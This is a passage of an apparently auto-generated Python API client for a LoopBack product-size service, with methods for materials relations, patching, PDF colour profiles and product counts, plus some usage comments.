_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_materials_fk_get(self, id, fk, **kwargs):
"""
Find a related item by id for materials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_fk_get(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:return: ProductMaterial
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_materials_fk_get_with_http_info(id, fk, **kwargs)
else:
(data) = self.product_sizes_id_materials_fk_get_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_materials_fk_get_with_http_info(self, id, fk, **kwargs):
"""
Find a related item by id for materials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_fk_get_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:return: ProductMaterial
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_materials_fk_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_materials_fk_get`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_materials_fk_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/materials/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductMaterial',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_materials_fk_put(self, id, fk, **kwargs):
"""
Update a related item by id for materials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_fk_put(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:param ProductMaterial data:
:return: ProductMaterial
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_materials_fk_put_with_http_info(id, fk, **kwargs)
else:
(data) = self.product_sizes_id_materials_fk_put_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_materials_fk_put_with_http_info(self, id, fk, **kwargs):
"""
Update a related item by id for materials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_fk_put_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:param ProductMaterial data:
:return: ProductMaterial
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_materials_fk_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_materials_fk_put`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_materials_fk_put`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/materials/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductMaterial',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_materials_get(self, id, **kwargs):
"""
Queries materials of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str filter:
:return: list[ProductMaterial]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_materials_get_with_http_info(id, **kwargs)
else:
(data) = self.product_sizes_id_materials_get_with_http_info(id, **kwargs)
return data
def product_sizes_id_materials_get_with_http_info(self, id, **kwargs):
"""
Queries materials of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str filter:
:return: list[ProductMaterial]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_materials_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_materials_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/materials'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ProductMaterial]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
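# Usage sketch (editorial addition, not generated code): a synchronous
# query of a ProductSize's materials. Assumes `api` is an instance of
# this class backed by a configured ApiClient; 'size-1' is a
# hypothetical id and `filter` follows the LoopBack JSON filter syntax.
#
#   materials = api.product_sizes_id_materials_get(
#       'size-1', filter='{"limit": 10}')
#   for material in materials:
#       pprint(material)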
def product_sizes_id_materials_post(self, id, **kwargs):
"""
Creates a new instance in materials of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_post(id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param ProductMaterial data:
:return: ProductMaterial
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_materials_post_with_http_info(id, **kwargs)
else:
data = self.product_sizes_id_materials_post_with_http_info(id, **kwargs)
return data
def product_sizes_id_materials_post_with_http_info(self, id, **kwargs):
"""
Creates a new instance in materials of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_post_with_http_info(id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param ProductMaterial data:
:return: ProductMaterial
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_materials_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_materials_post`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/materials'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductMaterial',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
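# Usage sketch (editorial addition): creating a material under a
# ProductSize. The body is deserialized server-side as a
# ProductMaterial; the field name used here is illustrative, not taken
# from the model definition.
#
#   created = api.product_sizes_id_materials_post(
#       'size-1', data={'name': 'Matte 200gsm'})
#   pprint(created)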
def product_sizes_id_materials_rel_fk_delete(self, id, fk, **kwargs):
"""
Remove the materials relation to an item by id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_rel_fk_delete(id, fk, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_materials_rel_fk_delete_with_http_info(id, fk, **kwargs)
else:
data = self.product_sizes_id_materials_rel_fk_delete_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_materials_rel_fk_delete_with_http_info(self, id, fk, **kwargs):
"""
Remove the materials relation to an item by id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_rel_fk_delete_with_http_info(id, fk, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_materials_rel_fk_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_materials_rel_fk_delete`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_materials_rel_fk_delete`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/materials/rel/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_materials_rel_fk_head(self, id, fk, **kwargs):
"""
Check the existence of materials relation to an item by id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_rel_fk_head(id, fk, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_materials_rel_fk_head_with_http_info(id, fk, **kwargs)
else:
data = self.product_sizes_id_materials_rel_fk_head_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_materials_rel_fk_head_with_http_info(self, id, fk, **kwargs):
"""
Check the existence of materials relation to an item by id.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_rel_fk_head_with_http_info(id, fk, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_materials_rel_fk_head" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_materials_rel_fk_head`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_materials_rel_fk_head`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/materials/rel/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'HEAD',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
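# Usage sketch (editorial addition): the HEAD endpoint is an existence
# check for the relation and is decoded as a bool. Ids are hypothetical.
#
#   if not api.product_sizes_id_materials_rel_fk_head('size-1', 'mat-9'):
#       print('material mat-9 is not linked to size-1')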
def product_sizes_id_materials_rel_fk_put(self, id, fk, **kwargs):
"""
Add a related item by id for materials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_rel_fk_put(id, fk, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:param ProductSizeMaterial data:
:return: ProductSizeMaterial
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_materials_rel_fk_put_with_http_info(id, fk, **kwargs)
else:
data = self.product_sizes_id_materials_rel_fk_put_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_materials_rel_fk_put_with_http_info(self, id, fk, **kwargs):
"""
Add a related item by id for materials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_materials_rel_fk_put_with_http_info(id, fk, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for materials (required)
:param ProductSizeMaterial data:
:return: ProductSizeMaterial
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_materials_rel_fk_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_materials_rel_fk_put`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_materials_rel_fk_put`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/materials/rel/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductSizeMaterial',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
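# Usage sketch (editorial addition): linking and unlinking through the
# rel/{fk} endpoints. PUT creates the through-model record
# (ProductSizeMaterial); DELETE removes only the relation, leaving the
# material itself in place. Ids are hypothetical.
#
#   link = api.product_sizes_id_materials_rel_fk_put('size-1', 'mat-9')
#   api.product_sizes_id_materials_rel_fk_delete('size-1', 'mat-9')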
def product_sizes_id_patch(self, id, **kwargs):
"""
Patch attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_patch(id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param ProductSize data: An object of model property name/value pairs
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_patch_with_http_info(id, **kwargs)
else:
data = self.product_sizes_id_patch_with_http_info(id, **kwargs)
return data
def product_sizes_id_patch_with_http_info(self, id, **kwargs):
"""
Patch attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_patch_with_http_info(id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param ProductSize data: An object of model property name/value pairs
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_patch" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_patch`")
collection_formats = {}
resource_path = '/ProductSizes/{id}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductSize',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
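# Usage sketch (editorial addition): PATCH sends only the attributes to
# change, leaving other stored values untouched. A plain dict of
# property name/value pairs is shown; the property name is illustrative.
#
#   updated = api.product_sizes_id_patch('size-1', data={'width': 210})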
def product_sizes_id_pdf_color_profile_get(self, id, **kwargs):
"""
Fetches belongsTo relation pdfColorProfile.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_pdf_color_profile_get(id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param bool refresh:
:return: ProductPdfColorProfile
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_pdf_color_profile_get_with_http_info(id, **kwargs)
else:
data = self.product_sizes_id_pdf_color_profile_get_with_http_info(id, **kwargs)
return data
def product_sizes_id_pdf_color_profile_get_with_http_info(self, id, **kwargs):
"""
Fetches belongsTo relation pdfColorProfile.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_pdf_color_profile_get_with_http_info(id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param bool refresh:
:return: ProductPdfColorProfile
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'refresh']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_pdf_color_profile_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_pdf_color_profile_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/pdfColorProfile'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'refresh' in params:
query_params['refresh'] = params['refresh']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductPdfColorProfile',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
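# Usage sketch (editorial addition): fetching the belongsTo relation
# pdfColorProfile. `refresh=True` asks the server to re-resolve the
# relation rather than serve a cached value; the id is hypothetical.
#
#   profile = api.product_sizes_id_pdf_color_profile_get(
#       'size-1', refresh=True)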
def product_sizes_id_products_count_get(self, id, **kwargs):
"""
Counts products of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_products_count_get(id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_products_count_get_with_http_info(id, **kwargs)
else:
data = self.product_sizes_id_products_count_get_with_http_info(id, **kwargs)
return data
def product_sizes_id_products_count_get_with_http_info(self, id, **kwargs):
"""
Counts products of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_products_count_get_with_http_info(id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'where']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_products_count_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_products_count_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/products/count'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'where' in params:
query_params['where'] = params['where']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
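# Usage sketch (editorial addition): counting related products with a
# LoopBack `where` clause passed as a JSON string. Per the usual
# LoopBack swagger spec the InlineResponse2001 wrapper exposes the tally
# as a `count` attribute; treat that attribute name as an assumption.
#
#   result = api.product_sizes_id_products_count_get(
#       'size-1', where='{"status": "active"}')
#   print(result.count)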
def product_sizes_id_products_delete(self, id, **kwargs):
"""
Deletes all products of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_products_delete(id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_products_delete_with_http_info(id, **kwargs)
else:
data = self.product_sizes_id_products_delete_with_http_info(id, **kwargs)
return data
def product_sizes_id_products_delete_with_http_info(self, id, **kwargs):
"""
Deletes all products of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
